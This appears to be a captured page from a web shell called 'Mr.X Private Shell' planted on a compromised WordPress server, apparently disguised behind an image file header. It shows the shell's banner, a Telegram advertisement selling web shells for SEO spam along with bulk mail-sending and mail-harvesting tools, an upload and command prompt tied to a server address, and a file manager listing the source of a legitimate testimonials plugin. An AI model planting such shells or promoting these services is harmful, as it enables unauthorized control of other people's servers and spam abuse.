����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<?php
require_once('easy_testimonial_maintenance_task.class.php');

global $easy_testimonials_maintenance_version;
$easy_testimonials_maintenance_version = '02022017';

class Easy_Testimonials_Maintenance
{
	function __construct()
	{
		if( is_admin() ){
			add_action( 'plugins_loaded', array($this, 'maintenance_check') );
		}
	}

	function maintenance_check()
	{
		global $easy_testimonials_maintenance_version;
		if ( get_site_option( 'easy_testimonials_maintenance_version' ) != $easy_testimonials_maintenance_version ) {
			//only require and instantiate this if we are actually performing maintenance
			require_once('tasks/fix_testimonial_featured_images.php');
			
			do_action('easy_testimonials_maintenance_tasks', $easy_testimonials_maintenance_version);

			/*
			 * All tasks complete
			 */
			update_option( 'easy_testimonials_maintenance_version', $easy_testimonials_maintenance_version );			
		}
	}	
}

$easy_t_maintenance = new Easy_Testimonials_Maintenance();

Filemanager

Name Type Size Permission Actions
tasks Folder 0755
easy_testimonial_maintenance_task.class.php File 813 B 0644
error_log File 2.92 KB 0644
maintenance.php File 1010 B 0644